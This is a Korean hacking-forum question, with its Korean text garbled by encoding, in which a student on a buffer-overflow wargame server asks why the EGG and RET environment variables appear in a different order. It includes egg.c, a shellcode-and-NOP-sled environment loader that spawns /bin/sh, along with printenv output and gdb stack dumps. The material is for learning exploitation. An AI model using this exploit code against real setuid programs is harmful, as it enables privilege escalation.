|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1681 [º¹»ç]
putenv(egg)
putenv(buff)
ÀÌ·¸°Ô ȯ°æ º¯¼ö¸¦ Ãß°¡ÇßÀ¸¸é
printenvÇßÀ» ¶§
EGG ~~~~~
RET ~~~~~
ÀÌ·¸°Ô ¾Æ·¡ Ãâ·Â °á°úó·³ ³ª¿Í¾ß Çϴµ¥
»õ·Î¿î ½©À» ¶ç¿ö³õ°í printenvÇϸé 2¹ø ° Ãâ·Â °á°úó·³
RET
EGG
ÀÌ·¸°Ô ¼ø¼°¡ µÚÁýÈ÷°í
ȯ°æ º¯¼öµé °¡¿îµ¥ Âë¿¡ µé¾î°¡³×¿ä
¿Ö ÀÌ·±°ÇÁö ¾Ë·ÁÁֽøé Á¤¸» °¨»çÇÏ°Ú½À´Ï´Ù.
1.-----------------------------egg.c¿¡ system(/bin/sh) ¾È ³ÖÀº °æ¿ì-------------------------------------------
(ȯ°æº¯¼ö Ãâ·ÂÀº egg.c¿¡ Ãâ·Â ¼Ò½º¸¦ Ãß°¡Çؼ ÇÑ °ÍÀÔ´Ï´Ù.)
Using address: 0xbffffbd4
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=1
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=./e
EGG=1A¡ÆF1U1E1EI¢æe1A¡Æ
[¢¶‹g1a¢¶g¢¶u1OI¢æe©¡yyy/bin/sh
RET=Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy¢¯Ouy
2.----------------------------egg¿¡ system(/bin/sh)Ãß°¡ ÇßÀ» ¶§ ȯ°æº¯¼ö Ãâ·Â-------------------------------
[student@BOF student]$ printenv
LESSOPEN=|/usr/bin/lesspipe.sh %s
USERNAME=
HISTSIZE=1000
HOSTNAME=BOF
LOGNAME=student
REMOTEHOST=110.35.139.193
MAIL=/var/spool/mail/student
TERM=xterm
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin
HOME=/home/student
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=student
RET=Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny¢¯Hny
EGG=1A¡ÆF1U1E1EI¢æe1A¡Æ
[¢¶‹g1a¢¶g¢¶u1OI¢æe©¡yyy/bin/sh
BASH_ENV=/home/student/.bashrc
LANG=en_US
OSTYPE=Linux
SHLVL=5
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
_=/usr/bin/printenv
--------------------------------------egg.c ¼Ò½º-------------------------------------------------------------------
int main(int argc, char *argv[])
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
// addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for(i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
// while( *environ)
// printf( "%s\n", *environ++);
// return 0;
system("/bin/bash");
}
------------------------------------½ºÅÿ¡ ½×ÀΠȯ°æ º¯¼ö Ãâ·Â------------------------------------------------
0xbffff2a2: "i686"
0xbffff2a7: "/home/student/get"
0xbffff2b9: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffff2db: "USERNAME="
0xbffff2e5: "HISTSIZE=1000"
0xbffff2f3: "HOSTNAME=BOF"
0xbffff300: "LOGNAME=student"
0xbffff310: "REMOTEHOST=110.35.139.193"
0xbffff32a: "MAIL=/var/spool/mail/student"
0xbffff347: "TERM=xterm"
---Type <return> to continue, or q <return> to quit---
0xbffff352: "HOSTTYPE=i386"
0xbffff360: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/student/bin"
0xbffff3a3: "HOME=/home/student"
0xbffff3b6: "INPUTRC=/etc/inputrc"
0xbffff3cb: "SHELL=/bin/bash"
0xbffff3db: "USER=student"
0xbffff3e8: "RET=Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯"...
0xbffff4b0: "Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯"...
0xbffff578: "Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy¢¯Xuy"
0xbffff5e8: "EGG=", '\220' <repeats 196 times>...
0xbffff6b0: '\220' <repeats 200 times>...
0xbffff778: '\220' <repeats 200 times>...
0xbffff840: '\220' <repeats 200 times>...
0xbffff908: '\220' <repeats 200 times>...
0xbffff9d0: '\220' <repeats 200 times>...
0xbffffa98: '\220' <repeats 200 times>...
0xbffffb60: '\220' <repeats 200 times>...
0xbffffc28: '\220' <repeats 200 times>...
0xbffffcf0: '\220' <repeats 200 times>...
0xbffffdb8: "1A¡ÆF1U1E1EI\200e\0251A¡Æ\013[\211\037\213g\0041a\211g\004\211u1OI\200e©¡yyy/bin/sh"
0xbffffde8: "BASH_ENV=/home/student/.bashrc"
0xbffffe07: "LANG=en_US"
0xbffffe12: "OSTYPE=Linux"
0xbffffe1f: "SHLVL=3"
0xbffffe27: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffeef: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbfffffb7: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffea: "/home/student/get"
|
Hit : 4136 Date : 2013/05/28 09:50
|
1576, 
1/79 
